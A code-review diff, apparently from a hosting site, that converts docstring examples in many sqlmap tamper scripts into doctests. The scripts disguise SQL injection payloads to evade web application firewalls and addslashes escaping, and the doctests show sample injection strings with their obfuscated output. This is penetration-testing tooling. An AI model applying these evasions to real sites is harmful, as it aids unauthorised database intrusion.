|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
|         * SQLite |         * SQLite | ||||||
| 
 | 
 | ||||||
|     Tested against: |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ZeroNights SQL injection challenge, |         * Used during the ZeroNights SQL injection challenge, | ||||||
|           https://proton.onsec.ru/contest/ |           https://proton.onsec.ru/contest/ | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -37,6 +33,10 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -26,10 +26,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL >= 5.1.13 |         * MySQL >= 5.1.13 | ||||||
| 
 | 
 | ||||||
|  | @ -40,6 +36,10 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT%08id%02FROM%0Fusers |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Microsoft SQL Server |         * Microsoft SQL Server | ||||||
| 
 | 
 | ||||||
|  | @ -35,6 +31,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%0Eid%0DFROM%07users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -14,16 +14,15 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a new line ('\n') |     a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23%0AAND%23%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT%0Bid%0BFROM%A0users |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -34,6 +30,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%A0id%0BFROM%0Cusers' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a dash comment ('--') followed by |     Replaces space character (' ') with a dash comment ('--') followed by | ||||||
|     a new line ('\n') |     a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1--%0AAND--%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
|         * MSSQL |         * MSSQL | ||||||
|  | @ -33,6 +29,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls. |         * Useful to bypass several web application firewalls. | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1--%0AAND--%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -16,14 +16,13 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces space character (' ') with plus ('+') |     Replaces space character (' ') with plus ('+') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT+id+FROM+users |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Is this any useful? The plus get's url-encoded by sqlmap engine |         * Is this any useful? The plus get's url-encoded by sqlmap engine | ||||||
|           invalidating the query afterwards |           invalidating the query afterwards | ||||||
|         * This tamper script works against all databases |         * This tamper script works against all databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT+id+FROM+users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT\rid\tFROM\nusers |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -31,6 +27,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%0Did%0DFROM%0Ausers' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -16,9 +16,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces UNION ALL SELECT with UNION SELECT |     Replaces UNION ALL SELECT with UNION SELECT | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper('-1 UNION ALL SELECT') | ||||||
|         * Input: -1 UNION ALL SELECT |     '-1 UNION SELECT' | ||||||
|         * Output: -1 UNION SELECT |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload |     return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload | ||||||
|  |  | ||||||
|  | @ -19,15 +19,14 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces quote character (') with a multi-byte combo %bf%27 together with |     Replaces quote character (') with a multi-byte combo %bf%27 together with | ||||||
|     generic comment at the end (to make it work) |     generic comment at the end (to make it work) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1' AND 1=1 |  | ||||||
|         * Output: 1%bf%27 AND 1=1--%20 |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful for bypassing magic_quotes/addslashes feature |         * Useful for bypassing magic_quotes/addslashes feature | ||||||
| 
 | 
 | ||||||
|     Reference: |     Reference: | ||||||
|         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string |         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string | ||||||
|  | 
 | ||||||
|  |     >>> tamper("1' AND 1=1") | ||||||
|  |     '1%bf%27 AND 1=1-- ' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Encloses each non-function keyword with versioned MySQL comment |     Encloses each non-function keyword with versioned MySQL comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# |  | ||||||
|         * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -35,6 +31,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls when the |         * Useful to bypass several web application firewalls when the | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') | ||||||
|  |     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Encloses each keyword with versioned MySQL comment |     Encloses each keyword with versioned MySQL comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# |  | ||||||
|         * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL >= 5.1.13 |         * MySQL >= 5.1.13 | ||||||
| 
 | 
 | ||||||
|  | @ -36,6 +32,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls when the |         * Useful to bypass several web application firewalls when the | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') | ||||||
|  |     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user